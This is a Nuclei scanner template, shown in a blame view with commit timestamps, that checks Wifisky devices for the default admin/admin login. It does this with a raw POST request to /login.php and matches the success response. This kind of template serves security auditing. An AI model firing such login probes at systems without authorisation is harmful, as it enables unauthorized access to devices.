nuclei-templates/default-logins/wifisky/wifisky-default-login.yaml

45 lines
861 B
YAML
Raw Normal View History

2021-09-21 11:46:53 +00:00
id: wifisky-default-login
2021-07-03 11:57:51 +00:00
info:
2021-09-22 10:37:07 +00:00
name: Wifisky Default Login
2021-07-03 11:57:51 +00:00
author: pikpikcu
severity: high
2021-07-03 12:31:31 +00:00
tags: default-login,wifisky
2021-07-03 11:57:51 +00:00
requests:
2021-07-03 12:29:27 +00:00
- raw:
- |
POST /login.php?action=login&type=admin HTTP/1.1
Host: {{Hostname}}
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
username={{username}}&password={{password}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
2021-07-03 11:57:51 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-03 12:29:27 +00:00
- "text/html"
2021-07-03 11:57:51 +00:00
part: header
- type: word
words:
2021-07-03 12:29:27 +00:00
- '"success":"true"'
- '"data":'
2021-07-03 11:57:51 +00:00
part: body
condition: and
- type: status
status:
2021-07-03 12:29:27 +00:00
- 200